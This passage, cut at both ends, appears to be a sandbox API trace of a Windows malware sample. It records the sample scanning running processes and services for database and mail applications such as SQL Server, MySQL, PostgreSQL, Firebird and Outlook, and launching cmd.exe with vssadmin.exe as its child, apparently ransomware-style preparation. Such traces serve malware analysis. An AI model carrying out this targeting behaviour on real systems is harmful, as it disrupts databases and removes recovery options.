(lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0049.203] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0049.203] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0049.203] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0049.203] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0049.203] lstrlenW (lpString="wininit.exe") returned 11 [0049.203] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0049.203] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0049.203] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0049.204] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0049.204] lstrlenW (lpString="csrss.exe") returned 9 [0049.204] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0049.205] lstrlenW (lpString="winlogon.exe") returned 12 [0049.205] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0049.206] lstrlenW (lpString="services.exe") returned 12 [0049.206] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0049.206] lstrlenW (lpString="lsass.exe") returned 9 [0049.207] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0049.207] lstrlenW (lpString="lsm.exe") returned 7 [0049.207] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.208] lstrlenW (lpString="svchost.exe") returned 11 [0049.208] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.209] lstrlenW (lpString="svchost.exe") returned 11 [0049.209] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.209] lstrlenW (lpString="svchost.exe") returned 11 [0049.209] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.210] lstrlenW (lpString="svchost.exe") returned 11 [0049.210] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.211] lstrlenW (lpString="svchost.exe") returned 11 [0049.211] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0049.212] lstrlenW (lpString="audiodg.exe") returned 11 [0049.212] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.212] lstrlenW (lpString="svchost.exe") returned 11 [0049.212] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.213] lstrlenW (lpString="svchost.exe") returned 11 [0049.213] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0049.214] lstrlenW (lpString="dwm.exe") returned 7 [0049.214] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0049.215] lstrlenW (lpString="explorer.exe") returned 12 [0049.215] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0049.215] lstrlenW (lpString="spoolsv.exe") returned 11 [0049.215] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.216] lstrlenW (lpString="taskhost.exe") returned 12 [0049.216] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.217] lstrlenW (lpString="svchost.exe") returned 11 [0049.217] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0049.217] lstrlenW (lpString="taskeng.exe") returned 11 [0049.218] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0049.218] lstrlenW (lpString="taskhost.exe") returned 12 [0049.218] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="called.exe")) returned 1 [0049.219] lstrlenW (lpString="called.exe") returned 10 [0049.219] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pal_bermuda_xhtml.exe")) returned 1 [0049.220] lstrlenW (lpString="pal_bermuda_xhtml.exe") returned 21 [0049.220] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="analyst.exe")) returned 1 [0049.220] lstrlenW (lpString="analyst.exe") returned 11 [0049.220] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolved_encourages_statewide.exe")) returned 1 [0049.221] lstrlenW (lpString="resolved_encourages_statewide.exe") returned 33 [0049.221] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wages.exe")) returned 1 [0049.222] lstrlenW (lpString="wages.exe") returned 9 [0049.222] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rand.exe")) returned 1 [0049.223] lstrlenW (lpString="rand.exe") returned 8 [0049.223] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vacations considered astrology.exe")) returned 1 [0049.223] lstrlenW (lpString="vacations considered astrology.exe") returned 34 [0049.223] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cottage.exe")) returned 1 [0049.224] lstrlenW (lpString="cottage.exe") returned 11 [0049.224] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pairs_spec.exe")) returned 1 [0049.285] lstrlenW (lpString="pairs_spec.exe") returned 14 [0049.286] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="arthur cyber bid.exe")) returned 1 [0049.286] lstrlenW (lpString="arthur cyber bid.exe") returned 20 [0049.286] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="observationshairy.exe")) returned 1 [0049.287] lstrlenW (lpString="observationshairy.exe") returned 21 [0049.287] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="portland-workforce-patient.exe")) returned 1 [0049.288] lstrlenW (lpString="portland-workforce-patient.exe") returned 30 [0049.288] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x15c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spectrum.exe")) returned 1 [0049.289] lstrlenW (lpString="spectrum.exe") returned 12 [0049.289] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dies.exe")) returned 1 [0049.290] lstrlenW (lpString="dies.exe") returned 8 [0049.290] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configured.exe")) returned 1 [0049.290] lstrlenW (lpString="configured.exe") returned 14 [0049.290] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rememberkatrina.exe")) returned 1 [0049.291] lstrlenW (lpString="rememberkatrina.exe") returned 19 [0049.291] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x488, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fast.exe")) returned 1 [0049.292] lstrlenW (lpString="fast.exe") returned 8 [0049.292] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="berkeley-challenges-binding.exe")) returned 1 [0049.293] lstrlenW (lpString="berkeley-challenges-binding.exe") returned 31 [0049.293] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="review.exe")) returned 1 [0049.293] lstrlenW (lpString="review.exe") returned 10 [0049.293] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="historybinding.exe")) returned 1 [0049.294] lstrlenW (lpString="historybinding.exe") returned 18 [0049.294] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pk task surge.exe")) returned 1 [0049.295] lstrlenW (lpString="pk task surge.exe") returned 17 [0049.295] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0049.295] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0049.295] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="mobsync.exe")) returned 1 [0049.296] lstrlenW (lpString="mobsync.exe") returned 11 [0049.296] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0049.297] lstrlenW (lpString="ivttvf.exe") returned 10 [0049.297] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa90, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0049.298] lstrlenW (lpString="cmd.exe") returned 7 [0049.298] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0049.298] lstrlenW (lpString="conhost.exe") returned 11 [0049.298] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0049.299] lstrlenW (lpString="vssadmin.exe") returned 12 [0049.299] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0049.300] lstrlenW (lpString="VSSVC.exe") returned 9 [0049.300] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0049.300] lstrlenW (lpString="svchost.exe") returned 11 [0049.300] Process32NextW (in: hSnapshot=0x224, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0049.301] CloseHandle (hObject=0x224) returned 1 [0049.301] Sleep (dwMilliseconds=0x1f4) [0050.208] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x5effd0 [0050.208] EnumServicesStatusExW (in: hSCManager=0x5effd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0050.208] GetLastError () returned 0xea [0050.208] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x12c6) returned 0x666b08 [0050.209] EnumServicesStatusExW (in: hSCManager=0x5effd0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x666b08, cbBufSize=0x12c6, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x666b08, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0050.209] CloseServiceHandle (hSCObject=0x5effd0) returned 1 [0050.210] lstrlenW (lpString="Appinfo") returned 7 [0050.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0050.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0050.210] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0050.210] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0050.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0050.210] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0050.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0050.210] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0050.210] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0050.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0050.210] lstrlenW (lpString="AudioSrv") returned 8 [0050.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0050.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0050.210] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0050.210] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0050.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0050.210] lstrlenW (lpString="BFE") returned 3 [0050.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0050.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0050.210] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0050.210] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0050.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0050.210] lstrlenW (lpString="CryptSvc") returned 8 [0050.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0050.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0050.210] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0050.210] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0050.210] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0050.210] lstrlenW (lpString="CscService") returned 10 [0050.210] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0050.210] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0050.210] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0050.211] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0050.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0050.211] lstrlenW (lpString="DcomLaunch") returned 10 [0050.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0050.211] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0050.211] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0050.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0050.211] lstrlenW (lpString="Dhcp") returned 4 [0050.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0050.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0050.211] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0050.211] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0050.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0050.211] lstrlenW (lpString="Dnscache") returned 8 [0050.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0050.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0050.211] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0050.211] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0050.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0050.211] lstrlenW (lpString="DPS") returned 3 [0050.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0050.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0050.211] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0050.211] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0050.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0050.211] lstrlenW (lpString="eventlog") returned 8 [0050.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0050.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0050.211] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0050.211] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0050.211] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0050.211] lstrlenW (lpString="EventSystem") returned 11 [0050.211] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0050.211] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0050.211] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0050.212] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0050.212] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0050.212] lstrlenW (lpString="gpsvc") returned 5 [0050.212] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0050.212] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0050.212] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0050.212] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0050.212] lstrcmpiW (lpString1="sqlserveradhelper", 